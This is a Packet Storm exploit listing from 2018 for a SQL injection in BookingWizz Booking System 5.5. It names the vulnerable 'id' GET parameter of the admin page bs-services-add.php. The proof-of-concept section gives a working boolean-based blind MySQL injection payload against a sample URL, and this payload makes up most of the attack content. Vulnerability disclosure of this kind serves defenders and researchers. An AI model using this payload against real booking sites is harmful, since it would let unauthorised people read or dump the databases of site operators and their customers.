BookingWizz Booking System 5.5 SQL Injection

2018-05-27T00:00:00
ID PACKETSTORM:147962
Type packetstorm
Reporter Ozkan Mustafa Akkus
Modified 2018-05-27T00:00:00

Description

                                        
                                            `# Exploit Title: BookingWizz Booking System 5.5 - 'bs-services-add.php' SQL Injection  
# Dork: N/A  
# Date: 27.05.2018  
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)  
# Vendor Homepage: https://codecanyon.net/item/booking-system/87919  
# Version: 5.5  
# Category: Webapps  
# Tested on: Kali linux  
# Description : The service editing on the admin panel is vulnerable.  
An attacker can exploit the entire database using this vulnerable in the  
'id' parameter.  
====================================================  
  
# PoC : SQLi :  
  
http://www.site.com/booking/bs-services-add.php?id=2  
  
Parameter: id (GET)  
Type: boolean-based blind  
Title: MySQL >= 5.0 boolean-based blind - Parameter replace  
Payload: id=(SELECT (CASE WHEN (6769=6769) THEN 6769 ELSE 6769*(SELECT  
6769 FROM INFORMATION_SCHEMA.PLUGINS) END))  
  
====================================================  
  
`